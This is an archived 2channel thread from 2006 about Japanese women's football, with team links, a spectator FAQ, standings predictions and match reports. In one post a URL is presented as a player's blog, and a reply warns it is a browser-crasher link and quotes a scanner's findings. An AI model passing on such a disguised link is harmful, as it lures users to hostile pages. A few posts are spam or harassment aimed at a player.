2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【mocなでしこ】Lリーグ&女子サッカー part22

1 :U-名無しさん:2006/05/05(金) 01:25:48 ID:afXvm9na0 ?
スポンサー様に感謝。

【注意】
■このスレには"age(仮称)"と呼ばれるage荒らしが住み着いてます。
■とにかくageろageろ、sageるな等を相当な粘着な投稿を続けます。
■DQNですので完全放置でお願いします。

前スレ
Lリーグ&女子サッカー part21
http://ex12.2ch.net/test/read.cgi/soccer/1142599153/
日本女子サッカーリーグ公式ホームページ
http://www.nadeshikoleague.jp/
日本サッカー協会 女子サッカー
http://www.jfa.or.jp/w/

※初めてこのスレにいらした方は、書き込み前に>>2-20あたりをご覧下さい。
スケベ目的なネタは厳禁。かわいい子とか知りたかったらスタジアムで探してね。
尚、サポネタ・テンプレ作成・要望はこちらでお願いします。
Lリーグ&女子サッカー、他 避難所
http://jbbs.livedoor.jp/sports/5908/

2 :U-名無しさん:2006/05/05(金) 01:28:05 ID:afXvm9na0
チーム公式サイト

2006年度L1
東京電力(TEPCO)マリーゼ
http://www.tepco-mareeze.jp/
浦和レッドダイヤモンズレディース
http://www.urawa-reds.co.jp/ladies/
日テレ・ベレーザ
http://beleza.ameblo.jp/
伊賀FCくノ一(準公式)
http://www.iga-younet.co.jp/kunoichi/
スペランツァFC高槻(準備中)
http://www.fctakatsuki.com/
TASAKIペルーレFC
http://www.tasaki.co.jp/what/perule1.html
INACレオネッサ
http://www.inac.or.jp/leonessa/
岡山湯郷Belle
http://mimasaka.city.mimasaka.lg.jp/belle/

3 :U-名無しさん:2006/05/05(金) 01:29:40 ID:afXvm9na0
ごめん、>>2を訂正
岡山湯郷Belle
http://www.yunogo-belle.com/

2006年度L2
ASエルフェン狭山FC
http://homepage1.nifty.com/as-elfen/
ジェフユナイテッド市原・千葉レディース(非公式)
http://www.jefladies.com/
アルビレックス新潟レディース
http://www.albirex.co.jp/under/ladys/
大原学園JaSRA 女子サッカー部
http://www.jasra.ac.jp/
清水第八スポーツクラブ
http://www.sdh-1978.com/
福岡Jアンクラス
http://anclas.fc2web.com/
ルネサンス熊本フットボールクラブ
http://homepage2.nifty.com/renaissance/indexold.html

バニーズ京都スポーツクラブ(旧・宝塚バニーズレディースサッカークラブ)は、
現在、公式サイトがありません。作成中との事なので完成するまで待ちましょう。

4 :U-名無しさん:2006/05/05(金) 01:30:17 ID:afXvm9na0
関連サイト・スレ

過去ログ置き場
http://tokyo.cool.ne.jp/l2ch/
チーム紹介など
http://k.excite.co.jp/hp/u/l2ch/
【なでしこJAPAN】日本女子代表総合スレッドPart10
http://ex12.2ch.net/test/read.cgi/eleven/1142160489/
【無料】Lリーグ・女子サッカーの会場【マターリ】
http://sports9.2ch.net/test/read.cgi/stadium/1098238415/
J's Goal「日本女子代表を応援しよう!」
http://www.jsgoal.jp/w_japan/
2002world「頑張れ!女子サッカー」
http://www.2002world.com/column/women/woman.html

写真・動画などをうpしたい方はこちら(良識のある使い方をおながいします)
スタジアム写真をウプするスレPart10
http://ex12.2ch.net/test/read.cgi/soccer/1143382620/
サッカー動画&写真うpスレin国内板 part6
http://ex12.2ch.net/test/read.cgi/soccer/1134309273/

5 :U-名無しさん:2006/05/05(金) 01:32:12 ID:afXvm9na0
たびたびスマン、>>4を訂正
サッカー動画&写真うpスレin国内板 part7
http://ex12.2ch.net/test/read.cgi/soccer/1145832140/

<Lリーグ・女子サッカー観戦のためのFAQ>

Q・Lリーグのチケットはどこで売ってますか?
A・Lリーグは原則全試合無料です。ただし、有料試合がいくつかありますので、詳細は
その都度ご確認ください:
 1.浦和および新潟の全ホームゲーム
 2.日テレホームゲームの茨城県内会場開催分
 3.Jリーグの試合とダブルヘッダーの場合、一部試合で(後座の場合は無料が
   多いのですが、前座の場合は有料試合が多いので、要確認)
 4.全日本女子選手権の準々決勝〜決勝戦
 5.なでしこスーパーカップ(1部リーグ優勝チームと、全日本女子選手権優勝
   チームとのカップ戦)

Q・リーグ戦はどこで行なってますか?
A・日本女子サッカーリーグ公式サイト、あるいは各クラブ公式サイトにてご確認ください。
たまに試合会場やキックオフ時刻の変更があります。

Q・スタジアムまでシャトルバスなどはありますか?
A・99,9%ないと思ってください。たまに他スポーツとのからみで運転されているときがありますが、
そのときはラッキーと思ってください。

6 :U-名無しさん:2006/05/05(金) 01:32:40 ID:afXvm9na0
Q・選手からサインはもらえますか?
A・試合後、出待ちをしていればたいていはもらえます。ただし、選手によっては照れからか
サインを断る可能性もありますので、「楷書でもいいよ」などと気持ちをほぐしてあげましょう。
なお、一部チームではサイン会を時々開催していますので、そこに行くのもひとつの手です。

Q・Jリーグとはここが違います
 1.売店はまずありません・・・食べ物飲み物は事前に準備するのを強くお勧めします。
 2.警備員がいる事もありません・・・ビンカン持ち込み放題ですが、後片付けは忘れずに
  (チームによっては、試合後の会場内後片付けを下部組織や地元高校の女子選手が
  担当しており、練習の合間を縫って無給で来てくれている彼女たちに余計な負担を
  かけないようにするためです。ゴミ袋を持参しておくのもいいかも)。
  ピッチに投げ込むなんて 論 外 で す ! !
 3.野次・ブーイングは、できる限り控えて・・・Lリーガーは全員アマチュア選手の上、
  中学生・高校生の選手も多いので、彼女達がプレーに専念するのを妨げる一因に
  ならないよう、ご協力お願いします。
 4.観客本位で開催スタジアムは選ばれてません・・・交通アクセスは糞レヴェル、
  行ってみたら鳴り物使用禁止・客席に屋根なし・客席からピッチまでの距離が大きい・
  トイレが遠いなど悪条件が揃いまくってますが、Jで使われるような立派な
  スタジアムを借りるための費用工面が難しいためです。
  ちなみにスタによっては更衣室やシャワー室がない・ピッチがボロボロなど、選手に
  とっても悪条件が揃いまくりですが、そんな環境下でも頑張る選手たちを応援してください。

Q・誰かかわいい子教えろ!巨乳はいないのか?
A・市ね。スケベな視点でしか女子スポーツ見れないのかゴラァ
  どうしても知りたかったらてめえの目で確認に来い!

7 :U-名無しさん:2006/05/05(金) 01:33:04 ID:afXvm9na0
Q・Lリーグ以外の女子サッカーにはどんなものがありますか?

A・地域リーグ(北海道・東北・関東・東海・関西・中国・四国・九州)
  都府県リーグ・都市リーグ・支部リーグ
  (大会としては全日本女子選手権および、その予選となる各地域の女子選手権、
  年代別だとU-18(冬)・U-15(夏)の全国選手権・予選となる各地域選手権など)

  U-12(少女)リーグ
  (大会としてはU-12全国選手権(昨年度から新設)・地域別選手権・8人制サッカー大会など)  
  レディース(ミセス・ママ)リーグ
  (大会としては、秋に静岡で行われる全国レディースサッカー選手権、および
  各地域別選手権(代表決定戦)など)

  高校サッカー ※学校によっては地域リーグなどに参加
  (大会としては冬から春に行われる地域別高校総体(インハイ、全国大会には
  女子サッカーは不参加の模様)、夏に磐田で行われる高校選手権など)

  大学サッカー ※学生リーグ以外に、地域リーグなどに参加するチームあり
  (大会としては冬に神戸で行われる大学選手権(インカレ)など)

  フットサルリーグ
  (リーグ戦や大会などが各地で開催中。大規模の大会としては、秋に東京で
  開催される全国選手権(ティファールカップ)がある。いずれは男子同様、
  日本代表が世界選手権に出る日も間近?)

  国民体育大会(国体)
  だいたい春頃に代表メンバーが選ばれ、8月に各地域代表決定戦、9月の
  夏季大会(これが本選)が行われます。
  ※今年兵庫県で開催の兵庫国体は、代表の試合がある関係上、10月頃に
  ずれこむ可能性があります。ご注意ください。

8 :U-名無しさん:2006/05/05(金) 01:33:31 ID:Pt4ezHPg0
重複ですよん

http://ex12.2ch.net/test/read.cgi/soccer/1146753338/l50







9 :U-名無しさん:2006/05/05(金) 01:33:32 ID:afXvm9na0
Q・下部組織チームって?

A・Jリーグのクラブ同様、下部組織を持ち選手育成を行っているチームがあります
(ただしJと違い、下部組織チーム設置の義務はありません)。
下部組織チームは育成と同時に「女子サッカーの普及」という役割を担う関係上、
殆どのクラブで門戸を開き、サッカー経験者に限らず初心者をも多く受け入れています
(例外:選手育成に特化している日テレ・メニーナはセレクションがあり、これに合格
しないと入団できません)。
高い力量を持つと判断された選手は、トップチームに二重登録されその後昇格して
いきますが、進学や他のクラブへの入団という進路を選ぶ選手も結構います。

入団資格は殆どが小学校高学年から中学生以上ですが、バニーズ京都SPIELENジュニア、
岡山湯郷Belle Kidsジュニア、ルネサンス熊本FCジュニアのように小学生を対象とした
ところもあります。

10 :U-名無しさん:2006/05/05(金) 01:34:14 ID:Pt4ezHPg0
失礼。
重複ですよ。

http://ex12.2ch.net/test/read.cgi/soccer/1146753338/l50













11 :U-名無しさん:2006/05/05(金) 01:37:17 ID:afXvm9na0
<下部組織チーム一覧> ※所属リーグは2006年度現在、間違いご指摘頼む

浦和レッドダイヤモンズジュニアユースレディース
(浦和レッドダイヤモンズレディース、関東女子リーグ)
エルフェンMARI(ASエルフェン狭山FC、埼玉県女子リーグ1部)
日テレ・メニーナ(日テレ・ベレーザ、関東女子リーグ)
アルビレックス新潟レディースU-18(アルビレックス新潟レディース、北信越女子リーグ)
伊賀FCフロイライン(伊賀FCくノ一、東海女子リーグ)
ラガッツァ'99 USED FC高槻スペランツァ(スペランツァFC高槻、関西女子チャレンジリーグ1部)
バニーズSC京都SPIELEN(バニーズ京都SC、関西女子チャレンジリーグ1部・京都府女子リーグ)
バニーズSC京都SPIELENジュニア(バニーズ京都SC、京都府U-12リーグ)
神戸FC1970レディース(TASAKIペルーレFC、関西女子リーグ)
INACレオネッサアマチュア(INACレオネッサ、関西女子チャレンジリーグ1部)
INACレオネッサユース(INACレオネッサ、関西女子チャレンジリーグ3部)
作陽レディース(岡山湯郷Belle)
岡山湯郷Belle Kidsジュニアユース(岡山湯郷Belle)
岡山湯郷Belle Kidsジュニア(岡山湯郷Belle、岡山県U-12リーグ)
福岡女学院Pasodorado(福岡Jアンクラス、福岡県リーグ1部)
福岡女学院Tunante(福岡Jアンクラス、福岡県リーグ2部)
福岡女学院Junior(福岡Jアンクラス、福岡県U-12リーグ)
ルネサンス熊本FCフェニックス(ルネサンス熊本FC、熊本県女子リーグ1部)
ルネサンス熊本FCフェニックスジュニア(ルネサンス熊本FC、熊本県U-12リーグ)

12 :U-名無しさん:2006/05/05(金) 01:43:35 ID:1QkuV1Ei0
ここは重複スレッドです。移動してください。

Lリーグ&女子サッカー part22
http://ex12.2ch.net/test/read.cgi/soccer/1146753338/



13 :U-名無しさん:2006/05/05(金) 01:45:30 ID:afXvm9na0
>>12のスレはアンチが立てたスレです。

14 :U-名無しさん:2006/05/05(金) 01:52:18 ID:NOKv9gbb0
>>12
もうL・リーグでは無いんだし、あちらのスレは公式のURLすら間違っている。
こちらは>>1に、sage推奨とも常時age進行とも書いて無いから、こちらが本スレで。


つーか、前スレを無理やり埋めた馬鹿は何なんだ。


15 :U-名無しさん:2006/05/05(金) 01:59:12 ID:1QkuV1Ei0
>>13
テンプレが気に入らない(URLに古いものが混じってた)程度で重複スレを立てる奴が一番のアンチだと思うが

これ以上の議論をしたいならこちらでどうぞ
■国内サッカー自治スレ19■
http://ex12.2ch.net/test/read.cgi/soccer/1146242046/

>>14
↓コレは何?なんでわざわざ削除された文章(詳しくは避難所)を入れてるんだ?

【注意】
■このスレには"age(仮称)"と呼ばれるage荒らしが住み着いてます。
■とにかくageろageろ、sageるな等を相当な粘着な投稿を続けます。
■DQNですので完全放置でお願いします。

16 :U-名無しさん:2006/05/05(金) 02:04:49 ID:afXvm9na0
たびたびたびスマン
>>2を訂正。(INACもURL変わってた。)

チーム公式サイト

2006年度L1
東京電力(TEPCO)マリーゼ
http://www.tepco-mareeze.jp/
浦和レッドダイヤモンズレディース
http://www.urawa-reds.co.jp/ladies/
日テレ・ベレーザ
http://beleza.ameblo.jp/
伊賀FCくノ一(準公式)
http://www.iga-younet.co.jp/kunoichi/
スペランツァFC高槻
http://www.fctakatsuki.com/
TASAKIペルーレFC
http://www.tasaki.co.jp/what/perule1.html
INACレオネッサ
http://www.inac.or.jp/
岡山湯郷Belle
http://www.yunogo-belle.com/

17 :U-名無しさん:2006/05/05(金) 02:08:15 ID:afXvm9na0
第6回伊賀市長杯女子サッカー大会「忍びの里レディーストーナメント」
開催中
http://www.iga-younet.co.jp/modules/news/article.php?storyid=428

大会初日の試合結果と2日目の日程
【グループA】伊賀FCくノ一5-0神奈川大、くノ一2-0吉備国際大
【グループB】バニーズ京都SC0-2大阪体育大、大体大1-1藤枝順心高
【グループC】三重県選抜0-9日本女子学生選抜、学生選抜5-0福岡J・アンクラス
【グループD】スペランツァF.C.高槻0-1名古屋FCレディース、東京女子体育大3-4名古屋

5日の試合開始時間は@10時〜A13時半〜B15時半〜
〈陸上競技場〉@高槻 VS 東女体大AA2位 VS B2位Bくノ一VS B1位
〈野球場〉@京都 VS 藤枝AグループC2位 VS グループD2位B学生選抜VS名古屋
〈ゆめが丘〉@神大 VS 吉備大AグループA3位 VS グループB3位BグループC3位 VS グループD3位
〈いがまちスポーツセンター〉@福岡VS三重

18 :U-名無しさん:2006/05/05(金) 02:40:12 ID:VUMGvhgLO
L1、L2の略称はDiv.1、Div.2に変えるべきなんだろうか?
それとも、なで1、なで2?

19 :U-名無しさん:2006/05/05(金) 03:14:41 ID:VUMGvhgLO
近頃は日本女子サッカーリーグの選手もプロ契約が増えてき始めたよね。

20 :U-名無しさん:2006/05/05(金) 03:16:27 ID:VUMGvhgLO
アルビの試合会場とかには売店出てるよ。

21 :U-名無しさん:2006/05/05(金) 06:44:21 ID:cF6Y2viF0
>>1乙です。
てんぷらが未完成の状態でのスレ立てで、可能な限り配慮してくれて感謝する。


22 :U-名無しさん:2006/05/05(金) 07:14:41 ID:1Mwzn8S00
>>1乙。

順位予想はまだ早いか?

23 :U-名無しさん:2006/05/05(金) 07:43:10 ID:nN4v/cgk0
>>22
いいんじゃね。今年はA赤→福島→真珠→温泉→忍者→INAC→高槻だな

24 :U-名無しさん:2006/05/05(金) 08:02:32 ID:YDGE+mO6O
ブッw
2位以下だけかよw

25 :U-名無しさん:2006/05/05(金) 08:13:54 ID:nN4v/cgk0
>>24
こないだの天皇賞と同じだお

26 :U-名無しさん:2006/05/05(金) 08:25:21 ID:YDGE+mO6O
>>25
まぁ、その点に関してはかなり同意だがな。

しかし俺はあえて大穴を狙う!
福島→緑→赤→真珠→温泉→INAC→忍者→高槻 で。

27 :U-名無しさん:2006/05/05(金) 08:30:57 ID:3ZPPLAwa0
>>1
乙です。ありがとう。

>>23
高槻の最下位には異議はないが、忍者はINACより
下になるかもしれない。
調整中とはいえ、昨日の忍びの里の出来では、早稲田や
日体大が出てたら負けてたと思う。


28 :1:2006/05/05(金) 08:42:16 ID:afXvm9na0
かなりバタバタしてたので、いろいろミスもあるが、まぁ許してくれ(汗
下部組織に、自分の判断で福岡のも入れておいたが、大丈夫だったろうか…。

というわけで、俺も順位予想〜〜w
日テレ→東電→浦和→真珠→INAC→岡山→伊賀→高槻

伊賀の戦力ダウンは、人妻の復帰くらいじゃ埋まらないと思う。
INACは予想以上にやりそうな悪寒だが…これはちょっと過大評価か?w

29 :U-名無しさん:2006/05/05(金) 09:01:33 ID:afXvm9na0
さぁて、そろそろ日本代表のトレーニングキャンプでも見に行ってきますかね。
熊本県民だしw

30 :U-名無しさん:2006/05/05(金) 09:18:39 ID:gqm0/BfR0
INACは補強をし選手の待遇良化そして練習施設も整った
上手くかみあえば4位辺りは狙えそうだな監督の力量が問われる


31 :U-名無しさん:2006/05/05(金) 09:34:49 ID:Zyojm76fO
伊賀は、ここ最近なりを潜めていた野戦病院ぶりが、
今年度に入って復活。原・藤村・宮崎の抜けた穴以外にも、
怪我人の穴をも埋めなければならないから、状況としては
きついと主。

高槻も鳥越と小中山が抜けた穴が埋まらないし(久山が怪我を
しなくなり、金房が成長すれば、かなり改善するとは思うが)。

京都も伊賀に負けず劣らずの野戦病院状態なのが痛い。
その上SH専門職が不在で、そこにFWを入れているから、
得点力不足が解消されないまま。

32 :U-名無しさん:2006/05/05(金) 09:38:39 ID:Vau9QAXF0
★水戸ホーリーホック女子サッカースクール無料体験及び生徒募集のお知らせ!(4/6)
水戸ホーリーホックサッカースクールでは、サッカーを広く普及させるため、
また地元から優れた選手を育てるための活動を展開しておりますが、
この度、女子サッカースクールを開校する事になりましたのでお知らせ致します。
○開校時期 2006年5月7日(日)・11日(木)より開校
         (4月9日(日)より毎週日・木曜日無料体験実施 時間:18:00〜20:00)
○練習場所 FUTPARQUEMITO

ttp://www.mito-hollyhock.net/hedline/head.html#0406

前回、前々回の全女、昨年と今年のLリーグ開催と茨城県は熱心です
川崎も女子に前向きっぽいことやってたが、その後どうなったかな?



33 :U-名無しさん:2006/05/05(金) 11:25:05 ID:YDGE+mO6O
>>32
浦和に対抗して鹿島あたりがやるなら面白そうだと思ってたが、
よく考えれば鹿嶋市の人口だと人が集まらないかw
素地としては水戸の方が可能性はあるか。

34 :U-名無しさん:2006/05/05(金) 11:51:53 ID:Sp1Er1OO0
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。




35 :U-名無しさん:2006/05/05(金) 14:42:51 ID:/OYYvukN0
真珠→浦和→東電→伊賀→INAC→岡山→高槻
根拠も自信も無いが、なんとなく予想したみる
プレーオフ上位リーグには真珠、浦和、東電
プレーオフ下位リーグには伊賀、INAC、岡山、高槻といったあたり
真珠は、阪口夢穂の加入もあり、そう力が落ちたとも思えない。
浦和は、好材料多く、柳田の加入が大きいと思う。
東電は、選手層も厚くなり、東電・サポーターの後方支援も万全。
ここまでは横一線でほとんど差が無いのではないか。
下位4チームは、やや水をあけられた感。ただしINACは未知数で不気味。
高槻は独自の戦い。

36 :U-名無しさん:2006/05/05(金) 16:35:12 ID:YDGE+mO6O
いずれにせよ、上4つと下4つの間には越えられない壁がある、ということか。

37 :U-名無しさん:2006/05/05(金) 17:13:10 ID:ohP863WTO
真珠→温泉→忍者→INAC→海豚→赤女
こんな感じだと下位のプレーオフが楽しめる


38 :U-名無しさん:2006/05/05(金) 19:18:28 ID:afXvm9na0
柳田と山郷が離脱orz
http://www.jfa.or.jp/CGI/top/top.cgi?key=pick&0=3245&lf=&yymm=

レッズ大丈夫か?

39 :U-名無しさん:2006/05/05(金) 19:21:20 ID:RHW0mWpx0
http://blog.oricon.co.jp/minamiichiro/
ここでWEB限定のNIKEサッカー動画が見れますよ!!

40 :U-名無しさん:2006/05/05(金) 19:24:19 ID:MZfJJ5d40
色んなスレに宣伝してますね

41 :U-名無しさん:2006/05/05(金) 20:41:16 ID:45mhK5/k0
>>38
また小金○タソの赤いほっぺが見られるのか (;´Д`)ハァハァ

42 :U-名無しさん:2006/05/05(金) 20:43:31 ID:HhuH7Kfx0
>>39
age厨は向こうのスレに行けや
それと女子サッカーが何か関係あるのか?
こっちのスレを女子サッカーと関係ない駄レスであげんな

43 :U-名無しさん:2006/05/05(金) 20:59:51 ID:zih7IFJ70
>>41
たいしたこたないんじゃないか。軽い捻挫ぐらいで。
なんとかなるかな、いけるかなと様子を見てたが、まあ無理をさせることもないと諦めたという程度の話。
と何の根拠も無く、いいほうに考えたい。
いや、決して赤いほっぺを見たくないといっているわけではない。

44 :U-名無しさん:2006/05/05(金) 21:00:41 ID:vNf9XecG0
忍びの里行ってきたのでレポします。

福岡ー高槻、一言で言えば自分達のスタイルを確立しているチームとそうでない
チームの差が如実に出た試合。

福岡は中盤をフラットに並べた4−4−2。
DFとMFの連携で囲いこんでボールを奪い、すぐにFWもしくはサイドハーフ
がスペースへ走り、そこに素早くボールを送る。「リアクションサッカー」と言
ってしまえばそれまでだが、全員が戦術を共通理解し徹底されている。何をやり
たいのか少し観ただけではわからないチームが多い2部では結構良いところまで
行くと予想する。2トップとサイドハーフは本当によく走る。特に柏原は窮屈そ
うにポストやっていた宝塚時代とは別人。個人的な注目選手は17才の川村。鋭
い突破から左サイドを蹂躙しまくった。


45 :U-名無しさん:2006/05/05(金) 21:01:12 ID:vNf9XecG0
高槻は3−4−2−1。後半からは4バック。選手交代とポジションの入れ替え
を頻繁に行っていていかにもテストという感じ。
何と評せばいいのだろう、このチーム。とりあえずボールをつなごうとしている
のはわかった。相手にプレッシャーかけられているのにバックラインや中盤の底
の危険な位置でパスを回そうとするのだから。ベレーザのようなタレント集団な
らそんなプレーもできるかもしれないが、技術が高くない選手がこんな事すると
すぐにボールをかっさらわれカウンターからシュートにもっていかれる。難しい
事をやろうとして自滅している印象を受ける。

試合は左を突破した川村が角度のないところから決めて福岡が先制。高槻DFラ
インが下がったところをペナルティエリアすぐ外から河島がミドルを決めて前半
は2−0。後半、高槻が右サイドのクロスから(おそらく東山)ヘッドを決めて
1点返すが直後に福岡も左サイドのクロスからヘッドを決め(得点者視認できず
、野球場は観難い)。終了間際、高槻DFの怠慢プレーからボールを奪った川村
がそのままドリブルシュートで4−1。内容からして妥当な結果。

46 :U-名無しさん:2006/05/05(金) 21:05:06 ID:jBC/h9Xd0
忍びの里二日目の結果でてたよ
ttp://www.iga-younet.co.jp/modules/news/article.php?storyid=430

47 :U-名無しさん:2006/05/05(金) 21:50:45 ID:vNf9XecG0
伊賀ー大体大、多くの人が(自分含めて)関心もっているのは伊賀のほう
と思うので伊賀中心に書きます。

システムは4−1−3−2。GK小林、DF庄子・馬場・山岸・村上、ボ
ランチ伊久間、攻撃的MF鈴木・堤・井坂、FW小野・村岡

良くも悪くもチームが変わった。一言で言えば「諸刃の剣」。調子次第
で上位も下位もありうる。去年までのとりあえず中位安定といったチーム
ではない(結果は中位の可能性が大きいだろうけど)。

新監督が意識改革を行っているようで前線がよく動く。個人的には小野・
村岡はボールウオッチャーになってる印象しかないんだが、今日は走りま
くっていた。2トップが精力的にフリーランニングすればスペースが生ま
れる。2列目がパス&ゴーとドリブルでどんどん飛び込んでいく。特に右
の鈴木は強力。スピードに乗ったドリブルがキレキレ、ノールックでダイ
レクトパスを出して点も取った。堤に代わってトップ下でみてみたい気が
する。

48 :U-名無しさん:2006/05/05(金) 21:51:26 ID:vNf9XecG0
反面、守備はザル。格下相手で攻めなければならないと状況なのもあって
右の庄子は上がりっ放し。残った3人と伊久間でカウンターに備える事に
なるんだが、村上が完全に穴。最初の失点は彼女があっさりとかわされて
クロスをあげられたのがが原因。大体大のチャンスはほとんどこのサイド
から。山岸・馬場の2人だけでは広いスペースをカバーしきれない。やは
り宮崎・藤村の抜けた穴が大きい。

試合内容は、天皇杯のJ1チームの初戦でよくあるパターン。圧倒的に攻
めながら(前後半ともにかるく10本以上はシュートしていた)なかなか
突き放せず、逆にカウンターで失点し苦しむが番狂わせだけは防いだ。
得点経過はもうYOUに出ているので省略。

戦力が薄く実力は上がったとも下がったとも言えないが、スリリングで観
て面白いチーム。これからの熟成していく事を期待したい。

49 :U-名無しさん:2006/05/06(土) 00:50:54 ID:hUzALykiO
ところで京都はどんな選手が出てたんだろう?

明日は開幕同カード。
京都・福岡共に手の内を出すのかな。

50 :U-名無しさん:2006/05/06(土) 01:43:35 ID:B+pam2qE0
っていうかどっちが本スレなんだ…

51 :U-名無しさん:2006/05/06(土) 05:35:48 ID:n3A1HulZO
>いつもの人(かな?)
レポ乙です。大阪体大は、2トップの島村と田村、ボランチの
鈴木が印象的でしたな。
GKも前半藤澤、後半大野、どちらもよかったし。

ちなみに伊賀21番は清原です。

京都のスタメンは、サポサイトの速報掲示板に出ていたかと。

52 :U-名無しさん:2006/05/06(土) 06:09:09 ID:oxhJvL1o0
>>33
しかし、茨木県内の女子チームで期待が持てそうなチームが、水戸市内にない罠。
鹿嶋市周辺にはKashima LFCというチームがあるのに。

53 :U-名無しさん:2006/05/06(土) 06:31:06 ID:JYACBTsHO
>>49
美形度が上がって年齢は下がったw
連戦なんでスタメンも試合毎に違ってるし

54 :U-名無しさん:2006/05/06(土) 06:46:05 ID:CCGAJKp10
既出? 生中継やるんだね。

BS日テレ 12:55〜15:00
女子サッカー なでしこジャパン 国際親善試合
「日本女子代表×アメリカ女子代表」
〜熊本県民総合運動公園陸上競技場(KK WING)〜
【解説】高倉麻子 【実況】上野聡行(KKT)

55 :U-名無しさん:2006/05/06(土) 07:00:51 ID:CCGAJKp10
日付忘れたorz

5/7(日曜) BS日テレ 12:55〜15:00
女子サッカー なでしこジャパン 国際親善試合
「日本女子代表×アメリカ女子代表」
〜熊本県民総合運動公園陸上競技場(KK WING)〜
【解説】高倉麻子 【実況】上野聡行(KKT)

5/9(火曜) BS日テレ 15:55〜18:00
女子サッカー なでしこジャパン国際親善試合
「日本女子代表×アメリカ女子代表」
〜大阪長居スタジアムより生中継〜
【解説】大竹奈美 【実況】小澤昭博(YTV)

56 :U-名無しさん:2006/05/06(土) 08:15:51 ID:62KYYNEl0
>>51
はい、いつもの人ですw。

>ちなみに伊賀21番は清原です。
プログラムで6番になってる選手ですね。高槻は7番の選手が出てたはず
なのにのってないし、あてにならないな、これ。



57 :U-名無しさん:2006/05/06(土) 08:22:29 ID:/EbWy/zu0
>>44
れぽ乙です。なるほど福岡はしっかりしたチームのようだ。
選手兼監督の河島 美絵さんがいわれるようにアンクラス旋風がありそうですね。
それに比べて高槻はやはり草刈場必至の情勢かな。
>>48
伊賀はやはりディフェンスに難ありのようですね。
でも中川、佐藤がいるし、そんなに酷いことにもならんと見てたんだけどなあ。
今回は連戦ってこともあるし、ベストの布陣でもないんじゃないかな。

58 :U-名無しさん:2006/05/06(土) 08:27:45 ID:n3A1HulZO
>>56
プログラム用のメンバー表を提出後、登録内容に変更が
あっても、反映がされないのがつらいところで。

高槻の7番は、松下バンビーナ時代の選手で、今はUSEDで
プレーしている方が、大会限定で登録しているそうです。
福岡も、プログラムに名前のない12番のGKが出場していました。

清原の場合は、26番ユニの製作が間に合わず、那須の番号を
当初は借りるつもりだったのでしょう。

59 :U-名無しさん:2006/05/06(土) 08:57:21 ID:62KYYNEl0
>>57
まあプレマッチですし、参考程度ですね。
リーグに入ったらボランチは那須が入るでしょうし。
高槻も奥田・庭田が入れば生まれ変わる、といいなあ・・・。
戦術などより選手から、なんか嫌なものを無理にやってるような雰囲気が。
福岡の選手がのびのびやっていたので特に。

>>58
福岡のGK、やっぱり12番だったんですね。のってないのでこっちの見間違
いかと思ってしまってました。


60 :U-名無しさん:2006/05/06(土) 09:05:39 ID:68iLw6YOO
一部順位予想ばかりだが
二部はどうよ

漏れ的予想
新潟ー大原ー京都ー市原ー狭山ー福岡ー熊本ー第八

新潟は鉄壁で京都の復帰はしんどいか

大原学園と市原は拮抗するかと
ジャンボ効果期待

熊本と第八はやはり熊本が優位か


61 :U-名無しさん:2006/05/06(土) 09:41:26 ID:/EbWy/zu0
漏れ的予想
新潟ー大原ー京都ー福岡ー狭山ー熊本ー市原ー第八


62 :U-名無しさん:2006/05/06(土) 09:52:24 ID:hUzALykiO
漏れも順位予想。
1部は日テレと高槻は鉄板
上位は日テレ》》田崎〉浦和〉東電、下位は岡山〉INAC》伊賀》》高槻。
引き分けで順位変動有

2部は新潟と熊本・清水は鉄板
新潟》》大原〉千葉〉福岡〉京都〉狭山》》熊本〉清水
中位はやってみないとわからない。千葉と福岡はチームの完成度が高い。

63 :61:2006/05/06(土) 10:43:57 ID:/EbWy/zu0
市原千葉はメンバー紹介見ただけだけど、水野、花桐ら何人かのレギュラーの名前が無いし、
15名しかいないんじゃ、そうとう心許ないかなと思ったのだが、そうでもないのかな。


64 :U-名無しさん:2006/05/06(土) 10:56:41 ID:hTRKdvdc0
予想に関しては一部より二部のほうが面白そうなので、
二部のみ予想参加。
新潟−福岡−大原−京都−市原−狭山−熊本−第八
福岡は相当やると思う。
忍びの里を見た限り、フィジカルの強さ、戦術の意思統一に加えて、
気になった点をすぐに確認し合うチームの雰囲気もいいと思った。
大原、京都は新メンバーを活かした体制作りに1年かかると予想。
市原は飛び道具的な選手がいないだけに上位4チームに入るのは
難しいと思ってる。



65 :U-名無しさん:2006/05/06(土) 11:01:20 ID:CgqKAjCXO
>>63
千葉は下部組織を整備しつつあるので、花桐とかの中高生は下部組織登録で
出てくるんじゃないかな、と思われ。

66 :U-名無しさん:2006/05/06(土) 11:11:38 ID:qDcjb0qpO
>>63
水野は結婚に伴い、高橋と改姓。
変わらず10番として在籍している。

67 :U-名無しさん:2006/05/06(土) 11:14:55 ID:hUzALykiO
なでしこリーグHPの各チーム紹介のところに掲載されている選手が現在の登録選手ということになるんだろうが、INACの外国人とか大原の移籍選手とかが載っていない。
京都も千葉も選手が少ないような気がする。
連休明けに追加登録の発表か?

68 :61:2006/05/06(土) 11:33:02 ID:/EbWy/zu0
>>65 >>66
ありがとう。安心した。さっそく予想を修正。
漏れ的予想
新潟ー大原ー京都ー福岡ー市原ー狭山ー熊本ー第八

69 :U-名無しさん:2006/05/06(土) 13:07:58 ID:ol4u+t3hO
福岡、3-0で京都に勝利。

70 :U-名無しさん:2006/05/06(土) 13:57:39 ID:JkJpvfIJ0
いつのまにかレッズレディーススレ無くなっとる


71 :U-名無しさん:2006/05/06(土) 13:57:39 ID:4dng+aDN0
>>1
この子のサイトもテンプレに入れてくれ

選手本人がやってるブログ
http://www2.strangeworld.org/uedakana/


72 :U-名無しさん:2006/05/06(土) 14:11:35 ID:aUH9PLC70
>>71
※このアドレスは危険URLのひとつです。

注意!アラートオープンを発見! (3)
注意!ループタグを発見! (2)
危険!mailtoストームを発見! (410)
危険!FDDアタックを発見!(4)
危険!無限ループを発見! (2)
危険!ニュースストームを発見! (3)
危険!Telnetストームを発見! (3)

ブラクラチェックが終了しました。

73 :U-名無しさん:2006/05/06(土) 14:14:47 ID:qDcjb0qpO
>いつもの人へ
福岡の12番は、16番の平野だそうです。
誠に申し訳ない。

